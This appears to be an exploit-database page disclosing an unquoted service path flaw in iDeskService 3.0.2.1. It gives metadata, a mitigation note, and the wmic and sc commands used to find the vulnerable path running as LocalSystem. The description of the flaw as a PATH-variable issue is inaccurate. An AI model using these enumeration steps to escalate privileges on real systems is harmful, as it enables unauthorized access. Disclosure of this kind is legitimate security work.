header-logo
Suggest Exploit
vendor:
iDeskService
by:
Leslie Lara
5.5
CVSS
MEDIUM
Unquoted Service Path
428
CWE
Product Name: iDeskService
Affected Version From: 3.0.2.1
Affected Version To: 3.0.2.1
Patch Exists: NO
Related CWE:
CPE: a:ideskservice:ideskservice:3.0.2.1
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro 64 bits
2020

iDeskService 3.0.2.1 – ‘iDeskService’ Unquoted Service Path

The iDeskService version 3.0.2.1 is vulnerable to an unquoted service path vulnerability. This vulnerability allows an attacker to escalate privileges by placing a malicious executable in a directory higher in the system's PATH environment variable.

Mitigation:

To mitigate this vulnerability, the vendor should update the software to use quoted paths for service binaries. Users should also ensure that they have the latest version of the software installed.
Source

Exploit-DB raw data:

# Exploit Title: iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path
# Discovery by: Leslie Lara
# Discovery Date: 7-09-2020
# Vendor Homepage: https://www.huawei.com/en/corporate-information
# Software Links : https://www.advanceduninstaller.com/iDesk-3_0_2_1-ac22913ee90dd58ca897d1ddf3d62a8f-application.htm
# Tested Version: 3.0.2.1
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro 64 bits

# Step to discover Unquoted Service Path: 
 

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
iDeskService               
      iDeskService                              C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe 
                                           Auto

C:\>sc qc "iDeskService"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: iDeskService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : iDeskService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem